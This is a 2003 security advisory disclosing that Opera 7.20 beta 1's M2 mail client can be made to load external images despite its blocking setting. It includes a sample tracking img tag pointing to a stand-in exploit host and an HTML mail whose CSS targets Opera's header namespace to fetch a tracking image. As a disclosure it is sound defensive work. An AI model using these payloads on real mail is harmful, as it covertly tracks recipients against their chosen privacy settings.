|
A vulnerability has been discovered in M2, the mail client in Opera 7.20, beta 1. Impact of vulnerability: ------------------------ Minor. Versions affected: ------------------ Opera 7.20 Beta 1, build 2981 only. All other Opera versions are safe. Description: ------------ Opera’s mail client, M2, has an option to suppress viewing of external embeds, turned on by default, that protects M2 users from having their e- mail tracked. This mechanism can be circumvented through the use of CSS. Discussion: ----------- External embeds are typically used by senders of unsolicited commercial email, spam, to act as “read receipts” and are typically 0×0 invisible images stored on a server. The typical way a spammer can use such an image, from here on refered to as a mail bug, is by sending an HTML formatted mail, containing a link to an image stored on a mail server. Example: <img src="http://exploit.example.com/img.gif?tracker=unique_tracker_id" width="0" height="0" /> The {unique_tracker_id} is a code unique to each mail sent out, and will give the spammer a confirmation that the mail sent out to a particular user was both received and opened. Details: -------- In Opera 7.20, when a mail is viewed in the mail client, an XML document is created, containing the mail headers and a mail body. Opera then uses CSS to apply style to this document. <omf:mime xmlns:omf="http://www.opera.com/2003/omf" xmlns:html="http://www.w3.org/TR/REC-html40"> <html:link rel="stylesheet" href="file://localhost/C:\Program Files\Opera7\Styles\mime.css" type="text/css"/> <showheaders href="attachment:/135/headers.html">Display all headers</showheaders> <headers><hgrp> <hdr name="To"><n>To</n><v>john.doe@example.com</v></hdr> </hgrp></headers> <body id='omf_body_start'> <div class='document'> <rfc822 id='1058899906'> <html:body> { mail content goes here } </html:body> </omf:rfc822 id='1058899906'> </div> </body> </omf:mime> When mail is displayed it uses a stylesheet found in the file mime.css in the Styles subdirectory of the Opera installation folder. The mail headers and bodies are styled using namespace declarations in the mail: @namespace omf url(http://www.opera.com/2003/omf); @namespace html url(http://www.w3.org/TR/REC-html40); omf|headers { /* style definitions */ } By sending a mail using Content-type: text/html, and embedding a mail with styles similar to the ones found in the Opera stylesheet, a malicious user could insert an image that is displayed in the header area of the mail. An example of such a mail could be: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <style type="text/css"> omf|headers { background-image: url(http://www.example.com/t.png) } </style> </head> <body> { Normal mail body here } </body> </html> Opera 7.20 beta 1 will now display the image referenced to in the style sheet, http://www.example.com/t.png, in the header area of the mail. Solution: --------- Either downgrade to Opera 7.11, or upgrade to Opera 7.20, beta 2, build 3014, as they are not affected by the problem. Other: ------ Opera software was notified of the problem on 2003-07-04 and acknowledged the problem the same day, but requested some time to create a fix. Opera Software released Opera 7.20 beta 2, which fixed the problem, on 2003-07- 22. A HTML version of this alert can be found at <URL:http://www.virtuelvis.com/archives/111.html> -- Arve Bersvendsen http://www.virtuelvis.com http://www.bersvendsen.com